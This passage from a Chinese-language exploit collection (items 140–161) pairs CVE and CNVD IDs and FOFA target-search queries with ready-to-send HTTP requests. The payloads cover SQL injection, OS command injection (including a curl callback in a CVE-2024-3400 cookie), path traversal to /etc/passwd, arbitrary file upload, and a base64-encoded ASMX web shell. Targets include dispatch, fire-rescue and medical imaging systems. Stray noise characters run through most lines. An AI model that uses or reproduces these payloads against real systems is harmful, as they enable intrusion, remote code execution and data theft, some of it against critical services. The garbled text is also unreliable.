GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
* y' j$ W4 ], k( g$ B# eHost: x.x.x.x3 E2 R9 C: O" M7 C( `) S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& |, z* m/ [1 H# F! R1 }0 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% i6 R: ^! ]5 Z% f# | s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! o Y; T( @$ t6 T& |Accept-Encoding: gzip, deflate, br
) a& d4 p2 N) h$ TConnection: close
3 ?# A# d1 U6 N, I3 ^$ [Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
, S t" F* D, a+ [8 q/ s7 gUpgrade-Insecure-Requests: 1: H- s8 V7 Q" Q( ~) K
1 e: g! H6 i5 D! V/ s' ~! e
' |; U' g" W" q& z8 j$ ]140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' C! C. `# B( n6 [, n6 Z
CVE-2024-25664 Z6 L' a1 r6 W$ A6 i
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" i. [. l; r' k. OGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
2 }9 r9 P: J6 F: a/ |; A B4 v3 {Host: x.x.x.x; Q% `9 R$ u& n+ q% I/ ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ R( ~$ n2 d9 ?& o/ _) \3 A0 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" U* y! Q, B xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& d* j$ Q6 V# B6 U; e' R( S. d4 U
Accept-Encoding: gzip, deflate, br
) P& j$ s [: ^Connection: close
L" L4 J7 u* Z U3 XCookie: authcode=h8g9# K. H6 s3 U4 I) M
Upgrade-Insecure-Requests: 1
0 h" G, V6 V" V7 }& e
+ r% E( v& U8 V. S" o
9 z7 x) q/ x U& G5 {. Y4 V; X% v2 E141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% r v* ?: ]# z0 k$ ]8 @* KFOFA:body="指挥调度管理平台"
- R6 a6 L/ ~9 U5 C+ q. J: sPOST /app/ext/ajax_users.php HTTP/1.1
! L/ Y3 L% E$ s; `4 MHost: your-ip
9 A* i [# U/ \% gUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
! P; H/ _3 k- h. O8 o/ ZContent-Type: application/x-www-form-urlencoded
) y, X K; V# _4 T; {
! f% U" G" A0 J# B5 u
' p/ C; z: U+ S1 H* Y0 Q3 xdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -4 t' S# P) O% F# J- c. f# u& Z
9 \1 B( B \$ j) o' b: n
0 Z/ o5 S4 j/ n+ s1 [% P; K- ^
142. CMSV6车辆监控平台系统中存在弱密码
8 f/ g7 r+ |( b w, }( qCVE-2024-296666 b ?6 D& l- N- C$ }9 V
FOFA:body="/808gps/"
( Z) b2 U+ l' wadmin/admin" M& ~( c9 f5 s
143. Netis WF2780 v2.1.40144 远程命令执行- f. H, o) t" S. A# g" ?, H
CVE-2024-25850
: |- \+ y4 c* [# bFOFA:title='AP setup' && header='netis'& u7 R) G+ p6 }8 Q" c- J. i
PAYLOAD
( b8 j. `$ { s" f
. P) @! t- M( _ }5 v144. D-Link nas_sharing.cgi 命令注入
# t7 A& w: ^$ k4 D: j" G7 qFOFA:app="D_Link-DNS-ShareCenter"4 ]/ |0 Y6 p" Z& F' x8 m
system参数用于传要执行的命令0 D4 O& V) [3 C5 ~
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
# S( |1 ^6 ?* k6 n" K$ h6 d! ?3 XHost: x.x.x.x
7 h1 s* R, R9 p+ WUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0: u% H6 a- T! Z _" U: A( I" b
Connection: close
- b! B2 d% C/ s! zAccept: */*( i* l3 o3 `+ N* P0 i( M' Y
Accept-Language: en
8 I, y6 r3 u2 u# qAccept-Encoding: gzip1 f' D. D7 A! O
, w; }9 v+ i+ O* p, A* \. q( O
, ?8 e1 A# p' b, Z4 h- A
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入. @/ H, b% q2 f: H; g: h
CVE-2024-3400
6 j9 w7 I% K' }9 l% B' ]( fFOFA:icon_hash="-631559155"' C/ ^1 g w8 O8 G0 u9 z2 {
GET /global-protect/login.esp HTTP/1.1
) c3 C0 h" D7 m! c8 D# {6 LHost: 192.168.30.112:10050 l8 w& v) n! V& w% e1 K- ?! _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' H! g7 h/ f p/ P+ s/ a$ s
Connection: close0 p0 Y4 o, i# e$ A/ E0 \
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
) Q8 F% ^# j, X* l7 b- @6 y1 TAccept-Encoding: gzip: k3 m" u5 T: t
1 N1 Q: h/ t# \
) { L( P/ c' s, X9 b0 ~146. MajorDoMo thumb.php 未授权远程代码执行2 D# R0 ?7 `: p* G6 J
CNVD-2024-02175
. y+ M0 {. ^( J4 {$ u. `7 a! r0 MFOFA:app="MajordomoSL"
8 r) K q) m# h9 I$ t( }GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
! u* x0 o) e$ s' THost: x.x.x.x
2 t/ E% u s7 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84. V0 f! [9 v9 p/ n
Accept-Charset: utf-8
' I( q1 d6 Q& j( J$ AAccept-Encoding: gzip, deflate7 H4 _& ?7 {$ a- z1 f+ I& T: I
Connection: close
& F" T0 D$ Z- ]5 l
4 P% ?$ _ m# [5 m1 Q) v' V6 }4 j3 X
6 L6 i3 t8 O* f; ]147. RaidenMAILD邮件服务器v.4.9.4-路径遍历6 B8 |7 f& b$ b' T! F0 P) S
CVE-2024-32399
% i2 J4 c3 y$ h. f( b$ cFOFA:body="RaidenMAILD"
8 k- v2 l5 l* S. e2 t4 rGET /webeditor/../../../windows/win.ini HTTP/1.1
_# N; A s0 t1 o" m0 dHost: 127.0.0.1:81. n/ h$ |) ?0 f2 x' z: K
Cache-Control: max-age=0' D) e+ i$ u K
Connection: close3 F3 R; e4 O0 b+ F: ?- @8 `
" K: g+ V) h) l
. @* j# b# p) q' X7 m/ _148. CrushFTP 认证绕过模板注入
b# K8 c$ ?3 s& u' `( b0 aCVE-2024-40409 R3 W+ L9 W0 I, y" a( I
FOFA:body="CrushFTP"' T2 O3 L3 H$ h( {* o: a- J3 R2 | n
PAYLOAD# v2 `2 r8 ?& w9 z/ W, n) {& @( o1 x
0 J: T0 z. S! K) C; h* Y. `
149. AJ-Report开源数据大屏存在远程命令执行, k$ b" T( w% U' F
FOFA:title="AJ-Report"
+ Q5 q0 ?1 v6 G3 r1 y7 W/ P# @6 I6 [
* J2 p4 v7 `4 GPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' u+ ]7 x- \# }) k. a. B- ^Host: x.x.x.x
* K8 U7 S, n wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 C9 T& a9 a }- Z) N7 b- i6 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! L, I( X2 v- p7 J5 KAccept-Encoding: gzip, deflate, br
; c1 K* Y' g4 hAccept-Language: zh-CN,zh;q=0.9
- S8 T& O s! g/ q. V: KContent-Type: application/json;charset=UTF-8
- L- k0 Q/ V) s: e, H8 C$ NConnection: close
0 [/ s7 t+ ?, Z! f3 ], n% P1 w9 I" S v
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
) f9 {* Z; p, l- B7 h9 ]4 ^, @7 n/ t; }. r
150. AJ-Report 1.4.0 认证绕过与远程代码执行
4 ~7 u! J7 m( B* CFOFA:title="AJ-Report"! ^& |6 ~' U! E+ `
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% n' g# i M- l6 o' c9 [Host: x.x.x.x& h+ F) f" _- E4 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* j8 K" Y( z/ o3 H/ p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 M0 h& c# _1 j( p, `, l0 ]" {
Accept-Encoding: gzip, deflate, br
, Q5 I2 q1 R' }! H5 @Accept-Language: zh-CN,zh;q=0.9
2 m$ U& B( _; k3 i+ O3 P! CContent-Type: application/json;charset=UTF-84 b0 @" U: \8 L4 V- j$ Y
Connection: close
2 ]! a$ n% k, Q1 `' @5 G- b. E5 tContent-Length: 339/ }! P/ Q! q0 G G/ ~( b
6 P6 N0 C; h- e; K/ |, O: s: q) b
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}0 c; k5 c2 n: E9 r
) Y. e ]& {, P6 F
) s$ ?1 T0 q+ [. @151. AJ-Report 1.4.1 pageList sql注入) W( T9 ^6 s: H6 M5 |
FOFA:title="AJ-Report"# X1 `' T, c+ F9 ~2 \% {4 l, Y
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
{% H% G3 P1 Q# |' f! t! w0 d4 @# R; GHost: x.x.x.x) ^# p% b/ K" t6 x6 n/ B' h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; [8 P4 }# ]. |2 WConnection: close
- d6 t$ C6 u: i- e5 @Accept-Encoding: gzip% I7 e }! o9 {2 ]1 y+ V, B) o
. X* @: W$ S4 @5 Y, {% M4 K" ]7 R2 I5 m3 b9 l' O8 P: k+ h B2 D
152. Progress Kemp LoadMaster 远程命令执行
8 Q+ W) K: O+ E7 `CVE-2024-1212
: g2 d8 d$ A' H& dLoadMaster <= 7.2.59.2 (GA)
9 F8 k$ V$ B* A3 gLoadMaster<=7.2.54.8 (LTSF)
, w' O% h3 Y- t: tLoadMaster <= 7.2.48.10 (LTS)
" o: @: o x! UFOFA:body="LoadMaster"" Y1 `0 P; i% [ R
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
& T! j% {" b8 V5 @0 j6 lGET /access/set?param=enableapi&value=1 HTTP/1.1
, v( g& J( N9 DHost: x.x.x.x% P+ P! z7 T) F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
- @# P( Y& r! d5 J7 IConnection: close
: ~/ @$ L- ? w' uAccept: */*! x! e3 e1 W9 o4 g
Accept-Language: en; H x% A6 O$ l$ [
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
g5 c3 O4 f# u3 C$ I4 X& q, {Accept-Encoding: gzip
$ P5 j' u4 n! E9 I7 E# q9 c8 A$ w( u% E, c& N+ \1 W5 D" \
! t6 F& w8 N( w3 }. B- h/ n
153. gradio任意文件读取
' K/ U% o5 S1 t6 m8 lCVE-2024-1561FOFA:body="__gradio_mode__"/ e2 J# f% o% J! t
第一步,请求/config文件获取componets的id$ J- {( b) _7 n: L) q/ V
http://x.x.x.x/config
8 h7 T' [) a$ n5 S2 ~/ q- Q
& _% l9 V0 r( h( u. i# g U2 b, R# \: t; ]
第二步,将/etc/passwd的内容写入到一个临时文件
% b) x0 h0 X# T1 \POST /component_server HTTP/1.1, x3 n3 |/ J- j$ n. G- D
Host: x.x.x.x M# K: T: z& b& u4 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
) Q% a+ _5 _4 e* i! l& }4 i/ FConnection: close3 p+ S+ {. Q4 w) z7 \% v
Content-Length: 1150 ^* c* o! o( S" |+ F" c' c
Content-Type: application/json
6 {) b. D6 z8 F0 ?: tAccept-Encoding: gzip
# R8 g+ E+ u+ u$ m9 ^; Q1 W! I
( z: @! u- U4 w9 H, M3 ?6 E{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}2 [/ |3 d9 Q( C r9 ]& s! j, ~
+ H0 k% Y9 u# b0 a8 L" a) {2 r, g; c4 | @
第三步访问 [- }6 l0 a* h" O. Y* v R
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd8 k# ^5 v5 W8 [( h' \3 e; L; O( a
5 ]/ s# Y) L1 c* T2 n8 j- W. o4 D" z9 n0 x! e5 A
154. 天维尔消防救援作战调度平台 SQL注入
: T. H# o- i1 j0 CCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
( ]( z8 t" x+ t$ y; A9 cPOST /twms-service-mfs/mfsNotice/page HTTP/1.1* M6 {' f8 z( j; i3 K* h+ j
Host: x.x.x.x
+ D% U% F G" Y( c/ A0 f7 BContent-Length: 106
' k9 Q! K' S. f4 SCache-Control: max-age=0
3 |. i6 M5 g$ }+ `: e5 j& f5 |& ~Upgrade-Insecure-Requests: 19 x2 N( N" c4 y) `2 |' h
Origin: http://x.x.x.x8 \- t7 h, l# L' p4 f, \) i" G. G
Content-Type: application/json
- W; {0 K( }- c8 Y; wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
& i3 R9 u4 s" q5 ~7 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 _( @$ d+ D- U. V1 P
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
3 s: X7 p# o: d7 bAccept-Encoding: gzip, deflate
9 Q; i+ F @1 a* B1 NAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7; B0 @% F$ r" S6 a& J- X
Connection: close8 v; l* _- l, T8 }* J4 ~0 R9 ]
4 o& N* A. |+ ]. b) `1 U& q. @{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}2 |1 u- J2 M+ K0 f. E
( F. q+ T W9 Y5 G9 R8 j* ]
+ A3 R4 F2 Z( w) ^' l4 {
155. 六零导航页 file.php 任意文件上传
% v; [" H: {8 O6 s4 sCVE-2024-34982
) M# A! v2 L% R# C0 z9 C+ r1 qFOFA:title=="上网导航 - LyLme Spage"& I2 p; C# j5 V
POST /include/file.php HTTP/1.1
6 c8 t9 e- G3 H# G, v4 xHost: x.x.x.x6 \; [& Y0 Q& R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; s6 W! e! E: C; x9 @3 u v: zConnection: close# M0 ~- f7 P2 ]
Content-Length: 232
. r" G* v: V( D( f$ v7 O- }Accept: application/json, text/javascript, */*; q=0.016 o& C' D+ ^ A' |2 o q3 @' M
Accept-Encoding: gzip, deflate, br
% e6 _* ^" J/ z2 k5 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# [6 m/ t2 e. ^8 R- Z+ OContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f; x7 U, M0 R- y: N8 d
X-Requested-With: XMLHttpRequest
4 N0 `# J" J# x% A) }! u( x8 H, F& w( N& ^6 J
-----------------------------qttl7vemrsold314zg0f
2 [2 x5 D* c" j/ R/ c: OContent-Disposition: form-data; name="file"; filename="test.php"& X+ p/ c4 [5 D% j
Content-Type: image/png) @2 V6 T1 R! f
# a9 D* @' m, J2 G1 f+ S<?php phpinfo();unlink(__FILE__);?>
5 ]9 b; s+ P) A+ h. Z/ g- u-----------------------------qttl7vemrsold314zg0f--
$ E% V( H; k8 T' x
1 w9 {5 x% p0 p# R+ f- M
! D! N* i* b) U+ }- ^0 n访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php2 V# \8 \ Z) M/ h
4 A' d, f: Y- i6 F156. TBK DVR-4104/DVR-4216 操作系统命令注入
- h4 j3 ?5 ]$ hCVE-2024-3721
# b$ R: s W% N% X6 e& D$ eFOFA:"Location: /login.rsp"
7 D) L% p& _. _3 ~·TBK DVR-4104
}2 {2 j! O5 f) d+ x·TBK DVR-4216
0 p2 Y' J2 W2 M6 n2 D$ e; s9 zcurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
! f) ^) N/ e1 e0 d' J
. p$ B, R2 C7 ^' b3 e: |
, j+ [6 j( w/ K; y, dPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
' R0 L: @! s6 W6 @$ w* I# }Host: x.x.x.x
6 Z* x9 E: S7 b7 a( a- q; Y6 W5 aUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& m0 I, {) _8 `5 ?( Z2 H
Connection: close
: E; ^: D( D9 F% W2 j7 lContent-Length: 0/ J2 ^( K' t- n5 f
Cookie: uid=1
! B. E) M6 v* f$ R, W( [/ rAccept-Encoding: gzip) u& V* J" ~9 K @
2 w. G9 W* `. m+ F' }* M/ t
1 n% e- @2 v s* f; p) A157. 美特CRM upload.jsp 任意文件上传
) W. W/ A+ R9 U3 MCNVD-2023-06971, c* I% n. U: s% ]. h
FOFA:body="/common/scripts/basic.js"# |2 @& N" V5 Z
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
* S8 c0 ^/ G6 C$ @) l5 ?: ^ wHost: x.x.x.x/ h8 J4 G' J2 X% @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36+ a6 y+ ]* P: g+ t
Content-Length: 709; W. ^$ D5 M* c& B- m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 d* t0 h4 F* v$ gAccept-Encoding: gzip, deflate! s: Q J' H: \8 ~
Accept-Language: zh-CN,zh;q=0.9
# K8 \0 R1 G# i$ N+ y& u7 ?Cache-Control: max-age=0
* u1 r* @7 e3 B5 MConnection: close
* u1 \9 z0 r' uContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
[4 F3 Q$ p3 T, d% x: i/ sUpgrade-Insecure-Requests: 1
& T0 n/ S: l% f) g4 w: P" _* d/ [ F$ Q9 @' V/ c
------WebKitFormBoundary1imovELzPsfzp5dN# _- `8 n/ ] u# o) ^- X
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
0 U7 E, s( m3 C& n8 z# W1 iContent-Type: application/octet-stream; g/ A2 O2 v: V2 o+ }
% v* g3 N+ d2 E# Z- h
nyhelxrutzwhrsvsrafb
$ c" D. o- c+ F+ J. b2 I9 [3 u3 z' X------WebKitFormBoundary1imovELzPsfzp5dN# ^# c2 k1 U' @
Content-Disposition: form-data; name="key"
5 K, V# P( ?( K5 I r& V1 \1 [5 A# z# f% K9 ]) p& i9 |6 J
null4 f* @8 H) r# }: O1 w! N
------WebKitFormBoundary1imovELzPsfzp5dN5 M) s2 b1 @6 N2 [. V
Content-Disposition: form-data; name="form"
+ _# z1 K$ x3 e/ t" M6 p
6 e U0 w, p# u fnull/ A+ p* `/ U& F7 S/ v* H: Z
------WebKitFormBoundary1imovELzPsfzp5dN! j/ c6 p; O, b9 w3 i) C
Content-Disposition: form-data; name="field"
9 ~4 Y7 `% ~* t1 z4 ], Q! j3 }3 g& N Q( y, u: n3 k9 `1 ^
null
+ W4 ?6 \ f% B7 q------WebKitFormBoundary1imovELzPsfzp5dN
/ u5 J6 B4 W! I; J! k2 \# K' UContent-Disposition: form-data; name="filetitile"
( `4 `% K$ R- O. t# q# r" V2 J( c
null" ]3 B$ e1 |& h. ^ P/ I5 q
------WebKitFormBoundary1imovELzPsfzp5dN" k: O; s) x! f
Content-Disposition: form-data; name="filefolder") Q/ h7 z: p: z& Y
% F; s7 n) A9 I% Y& r& {4 Xnull# K, Z! p. q) f
------WebKitFormBoundary1imovELzPsfzp5dN--1 ^+ o- U9 M7 j$ z' M
! ] k$ F5 d' \' _7 x& N( {, g9 ?! e
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp1 R" J D, L/ Y( p$ e& p8 }; Z9 V
0 P( J3 j$ P# p" H158. Mura-CMS-processAsyncObject存在SQL注入& _" K8 ]$ ^3 W! L+ ?
CVE-2024-32640
4 l( Z) W. }( J- d6 P1 O& \+ }FOFA:"Generator: Masa CMS"
% b, D; q' g% G( M$ a( V* qPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
2 f" g, Y$ t% o3 IHost: {{Hostname}}, R& c; Z- ]( v% b
Content-Type: application/x-www-form-urlencoded8 w- t' z4 G5 q, d
# ` U9 G5 ?+ h; t$ N. }7 }object=displayregion&contenthistid=x\'&previewid=1
, ~7 r$ y* l. F! X% q: |" l; I0 W# l
7 _- ]' C2 K, s, [9 ?% A3 o159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
# b: h. R7 v: Z4 c/ T6 UFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
) K/ y# Y0 E4 S4 dPOST /webservices/WebJobUpload.asmx HTTP/1.1
" ` `; V* O* J8 R! bHost: x.x.x.x9 u" B7 U+ g; f- k3 |: u' X8 b: E7 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
E2 B2 I7 a9 pContent-Length: 10807 H3 s8 h+ {2 C- t4 a
Accept-Encoding: gzip, deflate
1 r" a |% f7 Z1 d gConnection: close ^" [4 y! j3 ~$ ^
Content-Type: text/xml; charset=utf-8- B Q2 J8 K1 x% Z# T$ E/ B: @
Soapaction: "http://rainier/jobUpload"# d9 x) v4 L9 w3 T; W0 O' C/ j
" }! c. V$ y( c2 M6 x
<?xml version="1.0" encoding="utf-8"?>
2 L9 T. I% ]' S! t<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">. ~% q% \0 `) T' z4 ^+ u& s+ {
<soap:Body>
' I( R! n0 } D, B; z" S2 s<jobUpload xmlns="http://rainier">
3 O Q! i1 S; t) b$ C/ T7 k<vcode>1</vcode>
, C: M9 V- s7 |* p( I$ y" m5 W<subFolder></subFolder>, O$ K( p0 W- u# C
<fileName>abcrce.asmx</fileName>' K9 B+ E. Q1 k# B& J
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
* z0 D3 K& U; y</jobUpload>
9 ^4 R2 i; `/ _5 ?: N</soap:Body>
" c% f7 L1 _7 [$ G3 W# w {! g0 S</soap:Envelope>
! I' {0 A. m( F' ~ M z4 p' p4 U( g' u3 s
. f i4 s8 H9 S0 }: B
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
9 K& e# H- C# L9 I
$ V7 m4 h! H: F7 s# b/ p8 ]; ^& [, y, a: z: [& }
160. Sonatype Nexus Repository 3目录遍历与文件读取' s' T) q' _- K! z# L$ e3 e3 l
CVE-2024-4956
" n1 A; T, d0 d6 |; Y& F1 GFOFA:title="Nexus Repository Manager"
1 w \ |. z& `* ~. Y1 N% x% r% r7 {GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
7 s8 S6 A4 D7 g; j! u3 c7 nHost: x.x.x.x3 D; a( d: u) `1 E
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
g9 {' M5 g3 w$ S0 J* nConnection: close8 C% o3 v; Q" N' m
Accept: */*
3 K5 q8 U; L z2 aAccept-Language: en
" o3 B2 { F- C# H/ k/ nAccept-Encoding: gzip# I4 m5 T) l( k9 m5 M/ i& U
/ s% @! T7 m* w5 C- m
9 W; d- Q" u: h) r7 t161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 l/ [9 u, r" C* J1 HFOFA:body="/KT_Css/qd_defaul.css"3 f% e7 r- ]; [
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密7 p+ j; {8 l0 u" e
POST /Webservice.asmx HTTP/1.1
2 E% E0 F' h% U2 qHost: x.x.x.x
8 L0 x: y$ ^- V0 m: R! lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
. o2 h6 ]) p4 G* ]Connection: close
6 y" z! s* _/ D& |1 tContent-Length: 445$ n; h! u% @( v5 \" z: O3 Q
Content-Type: text/xml
8 @- {: h" W0 M3 LAccept-Encoding: gzip
0 J, k) }4 \# V9 z1 y
2 A0 k1 i" s1 |" g4 g+ O<?xml version="1.0" encoding="utf-8"?>& x) S1 \: z7 @2 ]6 F
<soap:Envelope xmlns:xsi="
* E- D( C) F# L8 Ehttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
' U& Q# i+ ]% Wxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
/ j; K1 f o. q6 k7 p/ y3 ]: Z<soap:Body>
7 V, d- m. q" Z) y3 B# P/ U<UploadResume xmlns="http://tempuri.org/">
L1 {4 p1 e$ D3 o F<ip>1</ip>4 v4 X- n" k" C5 @0 J
<fileName>../../../../dizxdell.aspx</fileName>, z/ H2 x5 h& Q
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>& ]/ ] j& U( p$ T7 Y r
<tag>3</tag>
1 B* l. T$ O% [3 ?</UploadResume>. }: j) n$ P/ j: m
</soap:Body>3 F! t1 j7 B- ^$ K2 i2 n
</soap:Envelope>
